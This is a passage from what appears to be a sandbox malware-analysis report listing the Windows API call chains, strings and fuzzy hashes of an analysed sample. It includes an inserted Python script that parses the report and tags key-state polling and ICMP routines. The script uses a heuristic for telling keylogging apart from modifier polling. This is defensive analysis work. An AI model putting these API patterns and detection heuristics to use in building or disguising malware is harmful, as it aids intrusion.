                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00C87D7A
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00C87D81
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00C87DD6
                                                                                      • CoUninitialize.OLE32 ref: 00C87DDC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 2762341140-0
                                                                                      • Opcode ID: e362f09e6d327f054f5091254d3536a3ad854bc4d10f2fa6a25a0ad3824de1e2
                                                                                      • Instruction ID: 829813c51877d6e04293407057d96a755dfbbd91e56fec1fa819b45cb40fd5b0
                                                                                      • Opcode Fuzzy Hash: e362f09e6d327f054f5091254d3536a3ad854bc4d10f2fa6a25a0ad3824de1e2
                                                                                      • Instruction Fuzzy Hash: EBC11C75A04109AFCB14DF64C888DAEBBF9FF49308B148599F8199B361D730EE81DB94
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CA5504
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CA5515
                                                                                      • CharNextW.USER32(00000158), ref: 00CA5544
                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CA5585
                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CA559B
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CA55AC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CharNext
                                                                                      • String ID:
                                                                                      • API String ID: 1350042424-0
                                                                                      • Opcode ID: a350eff7a0b8690eea8a47f783445c3ca02c8bf74f50abff32c2d342338b1e3f
                                                                                      • Instruction ID: 98758c65d8e06e5ad5483114f2a9b277d7ca06fc5aa90e10e1f631f99587f384
                                                                                      • Opcode Fuzzy Hash: a350eff7a0b8690eea8a47f783445c3ca02c8bf74f50abff32c2d342338b1e3f
                                                                                      • Instruction Fuzzy Hash: A461727190060AEBDF10CFA5CC84AFE7BB9EB0B728F148145F9259B290D7748A81DB60
                                                                                      APIs
                                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C6FAAF
                                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00C6FB08
                                                                                      • VariantInit.OLEAUT32(?), ref: 00C6FB1A
                                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C6FB3A
                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00C6FB8D
                                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C6FBA1
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C6FBB6
                                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00C6FBC3
                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C6FBCC
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C6FBDE
                                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C6FBE9
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                      • String ID:
                                                                                      • API String ID: 2706829360-0
                                                                                      • Opcode ID: 550fc13d046008b807ca374c59f412979889887474f0c90880871fc3192f7d67
                                                                                      • Instruction ID: 7b0361a5a22df591040135abe1e9eac198323296b03818636a876129ef69d2b5
                                                                                      • Opcode Fuzzy Hash: 550fc13d046008b807ca374c59f412979889887474f0c90880871fc3192f7d67
                                                                                      • Instruction Fuzzy Hash: 04414175A002199FCB10DFA8D898AFDBBB9FF49344F008069E955A7261CB30A946DF94
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?), ref: 00C79CA1
                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00C79D22
                                                                                      • GetKeyState.USER32(000000A0), ref: 00C79D3D
                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00C79D57
                                                                                      • GetKeyState.USER32(000000A1), ref: 00C79D6C
                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00C79D84
                                                                                      • GetKeyState.USER32(00000011), ref: 00C79D96
                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00C79DAE
                                                                                      • GetKeyState.USER32(00000012), ref: 00C79DC0
                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00C79DD8
                                                                                      • GetKeyState.USER32(0000005B), ref: 00C79DEA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: State$Async$Keyboard
                                                                                      • String ID:
                                                                                      • API String ID: 541375521-0
                                                                                      • Opcode ID: 6e77883cd58d345d4cc3a348f287678ce68dea2ee526c5ca91f61e308404e63d
                                                                                      • Instruction ID: 7fa7026c67827200eb6f8cb52d1aac8a917bba2afda696509dd9d41860039d10
                                                                                      • Opcode Fuzzy Hash: 6e77883cd58d345d4cc3a348f287678ce68dea2ee526c5ca91f61e308404e63d
                                                                                      • Instruction Fuzzy Hash: 7641A834504BC96DFF31966488443B5BEA1EF22344F08C05ADADA575C2EBB59BC8C792
                                                                                      APIs
                                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00C905BC
                                                                                      • inet_addr.WSOCK32(?), ref: 00C9061C
                                                                                      • gethostbyname.WSOCK32(?), ref: 00C90628
                                                                                      • IcmpCreateFile.IPHLPAPI ref: 00C90636
                                                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C906C6
                                                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C906E5
                                                                                      • IcmpCloseHandle.IPHLPAPI(?), ref: 00C907B9
                                                                                      • WSACleanup.WSOCK32 ref: 00C907BF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                      • String ID: Ping
                                                                                      • API String ID: 1028309954-2246546115
                                                                                      • Opcode ID: 59d30ca403f1a4683fe573fbf684d02212b0457bbbaaf194a9a8de72de8a4b53
                                                                                      • Instruction ID: 659d987caf52861a2c086655fb19326dd19638c6189db6aef74a8f9165639b7e
                                                                                      • Opcode Fuzzy Hash: 59d30ca403f1a4683fe573fbf684d02212b0457bbbaaf194a9a8de72de8a4b53
                                                                                      • Instruction Fuzzy Hash: D5917C35604201AFDB20DF55D888F1ABBE0AF45328F2585A9F4698B6A2C730ED85CF91
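The two function blocks above (the USER32 key-state poller at 00C79CA1 onward and the WSOCK32/IPHLPAPI echo routine at 00C905BC onward) are the kind of API chains an analyst reads straight off a sandbox report. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses a constructed excerpt written in the same per-function layout (the `APIs` list, then the `Similarity` fields), decodes the virtual-key constants passed to GetAsyncKeyState/GetKeyState and the Timeout argument of IcmpSendEcho, and returns a triage tag per function. The VK_* names and the "modifier-only polling" heuristic are the author's assumptions, chosen because every polled key in that block (0xA0, 0xA1, 0x11, 0x12, 0x5B) is a Shift/Ctrl/Alt/Win modifier, which is what an automation runtime's key-sending helper checks; it is not evidence of keylogging on its own.

```python
import re
from dataclasses import dataclass, field

# Constructed excerpt in the layout of the report's per-function blocks.
# The values mirror the two functions discussed above but this text is
# assembled for the example, not copied from the report page.
REPORT_EXCERPT = """\
APIs
• GetKeyboardState.USER32(?), ref: 00C79CA1
• GetAsyncKeyState.USER32(000000A0), ref: 00C79D22
• GetKeyState.USER32(000000A0), ref: 00C79D3D
• GetAsyncKeyState.USER32(00000011), ref: 00C79D84
• GetAsyncKeyState.USER32(0000005B), ref: 00C79DD8
Similarity
• API ID: State$Async$Keyboard
• String ID:
• Instruction Fuzzy Hash: 7641A834504BC96DFF31966488443B5BEA1EF22344F08C05ADADA575C2EBB59BC8C792
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00C905BC
• gethostbyname.WSOCK32(?), ref: 00C90628
• IcmpCreateFile.IPHLPAPI ref: 00C90636
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C906C6
• IcmpCloseHandle.IPHLPAPI(?), ref: 00C907B9
• WSACleanup.WSOCK32 ref: 00C907BF
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• Instruction Fuzzy Hash: D5917C35604201AFDB20DF55D888F1ABBE0AF45328F2585A9F4698B6A2C730ED85CF91
"""

# One API line: "• Name.MODULE(arg,arg), ref: ADDR" or "• Name.MODULE ref: ADDR".
# Lines such as "• Part of subcall function ..." deliberately do not match.
API_RE = re.compile(
    r"^•\s*(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\),)?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# Windows virtual-key codes (assumed mapping from winuser.h, not from the report).
VK_NAMES = {
    0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
    0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
    0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL",
    0xA3: "VK_RCONTROL", 0xA4: "VK_LMENU", 0xA5: "VK_RMENU",
}
MODIFIER_VKS = set(VK_NAMES)


@dataclass
class FunctionBlock:
    apis: list = field(default_factory=list)  # (name, module, [args], ref)
    api_id: str = ""
    string_id: str = ""
    fuzzy_hash: str = ""


def parse_blocks(text):
    """Split report text into FunctionBlocks; a new block starts at each 'APIs' header."""
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            section = "apis"
            continue
        if cur is None:
            continue
        if line in ("Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"):
            section = line
            continue
        if section == "apis":
            m = API_RE.match(line)
            if m:
                args = [] if m["args"] is None else [a.strip() for a in m["args"].split(",")]
                cur.apis.append((m["name"], m["module"], args, m["ref"]))
        elif line.startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• String ID:"):
            cur.string_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Instruction Fuzzy Hash:"):
            cur.fuzzy_hash = line.split(":", 1)[1].strip()
    return blocks


def polled_keys(block):
    """Virtual-key codes passed as literal constants to GetAsyncKeyState/GetKeyState."""
    return [int(args[0], 16) for name, _, args, _ in block.apis
            if name in ("GetAsyncKeyState", "GetKeyState") and args and args[0] != "?"]


def classify(block):
    """Triage tag derived only from the API chain and its literal arguments."""
    keys = polled_keys(block)
    if keys and set(keys) <= MODIFIER_VKS:
        # Only Shift/Ctrl/Alt/Win are polled: typical of a Send()-style helper,
        # not of a keylogger, which needs the full printable range.
        return "modifier-key polling: " + ",".join(VK_NAMES[k] for k in dict.fromkeys(keys))
    if keys:
        return "broad key-state polling (review for keylogging)"
    for name, _, args, _ in block.apis:
        # IcmpSendEcho's 8th parameter is Timeout in milliseconds.
        if name == "IcmpSendEcho" and len(args) == 8 and args[7] != "?":
            return f"ICMP echo with {int(args[7], 16)} ms timeout"
    return "unclassified"


if __name__ == "__main__":
    for b in parse_blocks(REPORT_EXCERPT):
        print(b.api_id, "->", classify(b))
```

Run it as a script and it prints one tag per function; as a triage aid, the point is that the verdict comes from the literal arguments the report preserved (0xA0, 0xFA0), not from the API names alone.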
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharLower
                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                      • API String ID: 707087890-567219261
                                                                                      • Opcode ID: 4c4395deb71ac892af65ef6e9e1f1b88efa659c3e3243d18fd6a1095db3f4d37
                                                                                      • Instruction ID: fcc99781b443433e0e62888ef2407a8ea24deaaa3865e157a68ed44b4b619980
                                                                                      • Opcode Fuzzy Hash: 4c4395deb71ac892af65ef6e9e1f1b88efa659c3e3243d18fd6a1095db3f4d37
                                                                                      • Instruction Fuzzy Hash: 2751C136A001169BCF14DF68C8549BEB3A5BF66720B204229F526E73C4EB35DE48D790
                                                                                      APIs
                                                                                      • CoInitialize.OLE32 ref: 00C93774
                                                                                      • CoUninitialize.OLE32 ref: 00C9377F
                                                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00CAFB78,?), ref: 00C937D9
                                                                                      • IIDFromString.OLE32(?,?), ref: 00C9384C
                                                                                      • VariantInit.OLEAUT32(?), ref: 00C938E4
                                                                                      • VariantClear.OLEAUT32(?), ref: 00C93936
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                      • API String ID: 636576611-1287834457
                                                                                      • Opcode ID: c1c503106544e849bb3fe7b36f6343b10728dede8fbd7ecbe95a273d44eec470
                                                                                      • Instruction ID: 73cd9988ca55e7a141b21d747548fa6ce3e152b506b77e1cf6f7bb12eae4e49e
                                                                                      • Opcode Fuzzy Hash: c1c503106544e849bb3fe7b36f6343b10728dede8fbd7ecbe95a273d44eec470
                                                                                      • Instruction Fuzzy Hash: 1661CE70208341AFDB10DF54C88CB6ABBE8EF49714F10091AF9959B291D770EE48DB96
                                                                                      APIs
                                                                                      • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00C833CF
                                                                                        • Part of subcall function 00C19CB3: _wcslen.LIBCMT ref: 00C19CBD
                                                                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00C833F0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: LoadString$_wcslen
                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                      • API String ID: 4099089115-3080491070
                                                                                      • Opcode ID: d680e22123b3fa85cc7e6fa0793d5f1e94bdce34b8271d0e28d8668b7d9b52da
                                                                                      • Instruction ID: 59c7ac9a7e28bf1e840823d4acd5e7437b9d81d964af3d4be3486d3fb9bf636f
                                                                                      • Opcode Fuzzy Hash: d680e22123b3fa85cc7e6fa0793d5f1e94bdce34b8271d0e28d8668b7d9b52da
                                                                                      • Instruction Fuzzy Hash: 8351AC71900249AADF14EBA0CD92EEEB778EF05744F144066F509721A2EB312F98FB60
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcslen$BuffCharUpper
                                                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                      • API String ID: 1256254125-769500911
                                                                                      • Opcode ID: 64b1185641e179dfbdf143d03354c5dac93fa7ff5e90d2e9875b2b35278b73aa
                                                                                      • Instruction ID: a95f5fa7ef181c713d1075588e4d0887c0d2fa84e0e593dfe9a41148ee55a2d4
                                                                                      • Opcode Fuzzy Hash: 64b1185641e179dfbdf143d03354c5dac93fa7ff5e90d2e9875b2b35278b73aa
                                                                                      • Instruction Fuzzy Hash: 9841D832A001269ACB146F7D88907BE77B5AF61764B258129F639D7284E735CE81C790
                                                                                      APIs
                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C853A0
                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C85416
                                                                                      • GetLastError.KERNEL32 ref: 00C85420
                                                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00C854A7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                      • API String ID: 4194297153-14809454
                                                                                      • Opcode ID: 1c26a69b5c6433bfa66afe46abbbb63e362678460a011b17f42220aa5dbd954f
                                                                                      • Instruction ID: 687e9efe11da535c230dd8b0acb7b2b9b87bbe2cf5d763936f6473c05653c412
                                                                                      • Opcode Fuzzy Hash: 1c26a69b5c6433bfa66afe46abbbb63e362678460a011b17f42220aa5dbd954f
                                                                                      • Instruction Fuzzy Hash: D231A375A006049FDB10EF68C484BAE7BF4EF85309F14806AE515CB392DBB1DE86DB90
                                                                                      APIs
                                                                                      • CreateMenu.USER32 ref: 00CA3C79
                                                                                      • SetMenu.USER32(?,00000000), ref: 00CA3C88
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CA3D10
                                                                                      • IsMenu.USER32(?), ref: 00CA3D24
                                                                                      • CreatePopupMenu.USER32 ref: 00CA3D2E
                                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CA3D5B
                                                                                      • DrawMenuBar.USER32 ref: 00CA3D63
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                      • String ID: 0$F
                                                                                      • API String ID: 161812096-3044882817
                                                                                      • Opcode ID: c89dec56ebc5cbd39ee45d1a5747405ddb136479c3b0d52b754f7a5482ed0a31
                                                                                      • Instruction ID: d754f2b1a928512efc728393e9351a7100c0340ce9e21bd9e756bdc07ba05c66
                                                                                      • Opcode Fuzzy Hash: c89dec56ebc5cbd39ee45d1a5747405ddb136479c3b0d52b754f7a5482ed0a31
                                                                                      • Instruction Fuzzy Hash: FE418A75A0120AEFDB14CF64D898BEE7BB5FF4A358F140029F916A7360D730AA10DB90
                                                                                      APIs
                                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CA3A9D
                                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CA3AA0
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00CA3AC7
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CA3AEA
                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CA3B62
                                                                                      • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00CA3BAC
                                                                                      • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00CA3BC7
                                                                                      • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00CA3BE2
                                                                                      • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00CA3BF6
                                                                                      • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00CA3C13
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$LongWindow
                                                                                      • String ID:
                                                                                      • API String ID: 312131281-0
                                                                                      • Opcode ID: bb75d45a8a6bdf956c3db4fc7d36b1b578d5cd740d30422ce77cf7a7d2afb65c
                                                                                      • Instruction ID: b24e242a5af7e021f4ed7bd53f76d647d5fc8e63795c0a2f53e22243eb3e5ed9
                                                                                      • Opcode Fuzzy Hash: bb75d45a8a6bdf956c3db4fc7d36b1b578d5cd740d30422ce77cf7a7d2afb65c
                                                                                      • Instruction Fuzzy Hash: 1E617D75900249AFDB10DFA4CC91FEE77B8EB0A718F140199FA15A7291C770AE41DB60
APIs
• GetCurrentThreadId.KERNEL32 ref: 00C7B151
• GetForegroundWindow.USER32(00000000,?,?,?,?,?,00C7A1E1,?,00000001), ref: 00C7B165
• GetWindowThreadProcessId.USER32(00000000), ref: 00C7B16C
• AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00C7A1E1,?,00000001), ref: 00C7B17B
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00C7B18D
• AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00C7A1E1,?,00000001), ref: 00C7B1A6
